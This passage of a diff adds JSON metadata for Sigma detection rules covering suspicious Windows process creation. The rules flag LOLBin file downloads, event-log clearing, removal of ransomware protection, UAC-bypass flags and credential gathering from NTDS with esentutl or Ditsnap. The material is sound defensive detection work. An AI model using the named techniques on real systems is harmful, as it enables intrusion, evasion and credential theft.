"proc_creation_win_susp_desktopimgdownldr.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", + 
"https://twitter.com/SBousseaden/status/1278977301745741825", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_desktopimgdownldr.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", + "value": "Suspicious Desktopimgdownldr Command" + }, + { + "description": "Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_devinit_lolbin.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1460815932402679809", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_devinit_lolbin.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "90d50722-0483-4065-8e35-57efaadd354d", + "value": "DevInit Lolbin Download" + }, + { + "description": "The Devtoolslauncher.exe executes other binary", + "meta": { + "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", + "creation_date": "2019/10/12", + "falsepositive": [ + "Legitimate use of devtoolslauncher.exe by legitimate user" + ], + "filename": "proc_creation_win_susp_devtoolslauncher.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/", + "https://twitter.com/_felamos/status/1179811992841797632", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_devtoolslauncher.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", + 
"value": "Devtoolslauncher.exe Executes Specified Binary" + }, + { + "description": "Detects usage of the \"dir\" command that's part of windows batch/cmd to collect information about directories", + "meta": { + "author": "frack113", + "creation_date": "2021/12/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_dir.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dir.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1217" + ] + }, + "uuid": "7c9340a9-e2ee-4e43-94c5-c54ebbea1006", + "value": "Suspicious DIR Execution" + }, + { + "description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", + "Legitimate administrator sets up autorun keys for legitimate reasons.", + "Discord" + ], + "filename": "proc_creation_win_susp_direct_asep_reg_keys_modification.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "24357373-078f-44ed-9ac4-6d334a668a11", + "value": "Direct Autorun Keys Modification" + }, + { + "description": "Detects command that is used to 
disable or delete Windows eventlog via logman Windows utility", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/02/11", + "falsepositive": [ + "Legitimate deactivation by administrative staff", + "Installer tools that disable services, e.g. before log collection agent installation" + ], + "filename": "proc_creation_win_susp_disable_eventlog.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1359039665232306183?s=21", + "https://ss64.com/nt/logman.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_eventlog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1070.001" + ] + }, + "uuid": "cd1f961e-0b96-436b-b7c6-38da4583ec00", + "value": "Disable or Delete Windows Eventlog" + }, + { + "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/06/19", + "falsepositive": [ + "Unknown, maybe some security software installer disables these features temporarily" + ], + "filename": "proc_creation_win_susp_disable_ie_features.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_ie_features.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", + "value": "Disabled IE Security Features" + }, + { + "description": "Detects commands that indicate a Raccine removal from an end system. 
Raccine is a free ransomware protection tool.", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/01/21", + "falsepositive": [ + "Legitimate deinstallation by administrative staff" + ], + "filename": "proc_creation_win_susp_disable_raccine.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/Raccine", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_raccine.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", + "value": "Raccine Uninstall" + }, + { + "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", + "meta": { + "author": "Ivan Dyachkov, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." + ], + "filename": "proc_creation_win_susp_diskshadow.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_diskshadow.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", + "value": "Execution via Diskshadow.exe" + }, + { + "description": "Detects the use of Ditsnap tool. 
Seems to be a tool for ransomware groups.", + "meta": { + "author": "Furkan Caliskan (@caliskanfurkan_)", + "creation_date": "2020/07/04", + "falsepositive": [ + "Legitimate admin usage" + ], + "filename": "proc_creation_win_susp_ditsnap.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2020/06/21/snatch-ransomware/", + "https://github.com/yosqueoy/ditsnap", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ] + }, + "uuid": "d3b70aad-097e-409c-9df2-450f80dc476b", + "value": "DIT Snapshot Viewer Use" + }, + { + "description": "Detects a \"dllhost\" spawning with no commandline arguments which is a very rare thing to happen and could indicate process injection activity or malware mimicking similar system processes", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/27", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_dllhost_no_cli.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/child-processes/", + "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dllhost_no_cli.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055" + ] + }, + "uuid": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", + "value": "Dllhost Process With No CommandLine" + }, + { + "description": "Execute C# code located in the consoleapp folder", + "meta": { + "author": "Beyu Denis, oscd.community", + "creation_date": "2019/10/26", + "falsepositive": [ + "Legitimate use of dnx.exe by legitimate user" + ], + "filename": "proc_creation_win_susp_dnx.yml", + "level": "medium", + 
"logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", + "https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dnx.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.t1027.004" + ] + }, + "uuid": "81ebd28b-9607-4478-bf06-974ed9d53ed7", + "value": "Application Whitelisting Bypass via Dnx.exe" + }, + { + "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", + "meta": { + "author": "Florian Roth (rule), @blu3_team (idea)", + "creation_date": "2019/06/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_double_extension.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html", + "https://twitter.com/blackorbird/status/1140519090961825792", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", + "value": "Suspicious Double Extension" + }, + { + "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2021/12/27", + "falsepositive": [ + "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" + ], + "filename": "proc_creation_win_susp_download_office_domain.yml", + "level": "high", + 
"logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/an0n_r0/status/1474698356635193346?s=12", + "https://twitter.com/mrd0x/status/1475085452784844803?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml" + ], + "tags": "No established tags" + }, + "uuid": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", + "value": "Suspicious Download from Office Domain" + }, + { + "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_dtrace_kernel_dump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1474899714290208777?s=12", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dtrace_kernel_dump.yml" + ], + "tags": "No established tags" + }, + "uuid": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", + "value": "Suspicious Kernel Dump Using Dtrace" + }, + { + "description": "Detects suspicious child processes of electron apps (teams, discord, slack...).\nThis could be a potential sign of \".asar\" file tampering (See reference section for more information)\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_electron_app_children.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://taggart-tech.com/quasar-electron/", + "https://github.com/mttaggart/quasar", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "f26eb764-fd89-464b-85e2-dc4a8e6e77b8", + "value": "Suspicious Electron Application Child Processes" + }, + { + "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", + "meta": { + "author": "FPT.EagleEye", + "creation_date": "2020/12/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_emotet_rundll32_execution.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html", + "https://cyber.wtf/2021/11/15/guess-whos-back/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_emotet_rundll32_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "value": "Emotet RunDLL32 Process Creation" + }, + { + "description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. 
Trickbot also uses this utilities to get MSEdge info via its module pwgrab.", + "meta": { + "author": "sam0x90", + "creation_date": "2021/08/06", + "falsepositive": [ + "To be determined" + ], + "filename": "proc_creation_win_susp_esentutl_params.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/vxunderground/status/1423336151860002816", + "https://attack.mitre.org/software/S0404/", + "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_esentutl_params.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1003.003" + ] + }, + "uuid": "7df1713a-1a5b-4a4b-a071-dc83b144a101", + "value": "Esentutl Gather Credentials" + }, + { + "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", + "meta": { + "author": "Ecco, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/09/26", + "falsepositive": [ + "Admin activity", + "Scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_eventlog_clear.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", + "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" + ] + }, + "uuid": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", + "value": "Suspicious Eventlog Clear 
or Configuration Using Wevtutil" + }, + { + "description": "Detects a suspicious execution from an uncommon folder", + "meta": { + "author": "Florian Roth, Tim Shelton", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_execution_path.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", + "value": "Execution from Suspicious Folder" + }, + { + "description": "Detects a suspicious program execution in a web service root folder (filter out false positives)", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/01/16", + "falsepositive": [ + "Various applications", + "Tools that include ping or nslookup command invocations" + ], + "filename": "proc_creation_win_susp_execution_path_webserver.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path_webserver.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "35efb964-e6a5-47ad-bbcd-19661854018d", + "value": "Execution in Webserver Root Folder" + }, + { + "description": "Attackers can use 
explorer.exe for evading defense mechanisms", + "meta": { + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", + "creation_date": "2020/10/05", + "falsepositive": [ + "Legitimate explorer.exe run from cmd.exe" + ], + "filename": "proc_creation_win_susp_explorer.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/CyberRaiju/status/1273597319322058752", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "9eb271b9-24ae-4cd4-9465-19cfc1047f3e", + "value": "Proxy Execution Via Explorer.exe" + }, + { + "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\n", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali, @gott_cyber", + "creation_date": "2019/06/29", + "falsepositive": [ + "Unknown how many legitimate software products use that method" + ], + "filename": "proc_creation_win_susp_explorer_break_proctree.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/CyberRaiju/status/1273597319322058752", + "https://twitter.com/bohops/status/1276357235954909188?s=12", + "https://twitter.com/nas_bench/status/1535322450858233858", + "https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", + "value": "Explorer Process Tree Break" + }, + { + "description": 
"Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/23", + "falsepositive": [ + "Domain Controller User Logon", + "Unknown how many legitimate software products use that method" + ], + "filename": "proc_creation_win_susp_explorer_nouaccheck.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/ORCA6665/status/1496478087244095491", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer_nouaccheck.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548.002" + ] + }, + "uuid": "534f2ef7-e8a2-4433-816d-c91bccde289b", + "value": "Explorer NOUACCHECK Flag" + }, + { + "description": "Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe", + "meta": { + "author": "Markus Neis, Sander Wiebing", + "creation_date": "2018/11/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_file_characteristics.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/muddywater/88059/", + "https://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_characteristics.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.006" + ] + }, + "uuid": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", + "value": "Suspicious File Characteristics Due to Missing Fields" + }, + { + "description": "Detects when GfxDownloadWrapper.exe downloads file from non standard URL", + "meta": { + "author": "Victor Sergeev, oscd.community", + "creation_date": 
"2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_file_download_via_gfxdownloadwrapper.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/GfxDownloadWrapper/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_download_via_gfxdownloadwrapper.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "eee00933-a761-4cd0-be70-c42fe91731e7", + "value": "GfxDownloadWrapper.exe Downloads File from Suspicious URL" + }, + { + "description": "Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed).", + "meta": { + "author": "frack113", + "creation_date": "2021/12/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_findstr_385201.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-5---security-software-discovery---sysmon-service", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_findstr_385201.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518.001" + ] + }, + "uuid": "37db85d1-b089-490a-a59a-c7b6f984f480", + "value": "Suspicious Findstr 385201 Execution" + }, + { + "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack", + "meta": { + "author": "Trent Liffick", + "creation_date": "2020/05/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_findstr_lnk.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://www.bleepingcomputer.com/news/security/hhsgov-open-redirect-used-by-coronavirus-phishing-to-spread-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_findstr_lnk.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1202", + "attack.t1027.003" + ] + }, + "uuid": "33339be3-148b-4e16-af56-ad16ec6c7e7b", + "value": "Findstr Launching .lnk File" + }, + { + "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", + "meta": { + "author": "Florian Roth, omkar72, oscd.community", + "creation_date": "2021/02/24", + "falsepositive": [ + "Admin activity (unclear what they do nowadays with finger.exe)" + ], + "filename": "proc_creation_win_susp_finger_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/bigmacjpg/status/1349727699863011328?s=12", + "https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/", + "http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_finger_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "af491bca-e752-4b44-9c86-df5680533dbc", + "value": "Finger.exe Suspicious Invocation" + }, + { + "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_format.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://twitter.com/0gtweet/status/1477925112561209344", + "https://twitter.com/wdormann/status/1478011052130459653?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_format.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", + "value": "Format.com FileSystem LOLBIN" + }, + { + "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", + "meta": { + "author": "Ecco, E.M. Anhaus, oscd.community", + "creation_date": "2019/09/26", + "falsepositive": [ + "Admin activity", + "Scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_fsutil_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md", + "https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ] + }, + "uuid": "add64136-62e5-48ea-807e-88638d02df1e", + "value": "Fsutil Suspicious Invocation" + }, + { + "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", + "meta": { + "author": "frack113", + "creation_date": "2022/05/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_gpresult.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ 
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult", + "https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", + "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gpresult.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1615" + ] + }, + "uuid": "e56d3073-83ff-4021-90fe-c658e0709e72", + "value": "Gpresult Display Group Policy Information" + }, + { + "description": "Detects creation of a scheduled task with a GUID like name", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/31", + "falsepositive": [ + "Legitimate software naming their tasks as GUIDs" + ], + "filename": "proc_creation_win_susp_guid_task_name.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_guid_task_name.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", + "value": "Suspicious Scheduled Task Name As GUID" + }, + { + "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/02/06", + "falsepositive": [ + "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" + ], + "filename": "proc_creation_win_susp_gup.yml", + "level": "high", 
+ "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "0a4f6091-223b-41f6-8743-f322ec84930b", + "value": "Suspicious GUP Usage" + }, + { + "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/10", + "falsepositive": [ + "Other parent processes other than notepad++ using GUP that are not currently identified" + ], + "filename": "proc_creation_win_susp_gup_download.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nas_bench/status/1535322182863179776", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "44143844-0631-49ab-97a0-96387d6b2d7c", + "value": "Download Files Using Notepad++ GUP Utility" + }, + { + "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/10", + "falsepositive": [ + "Other parent binaries using GUP not currently identified" + ], + "filename": "proc_creation_win_susp_gup_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nas_bench/status/1535322445439180803", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml" + ], + "tags": 
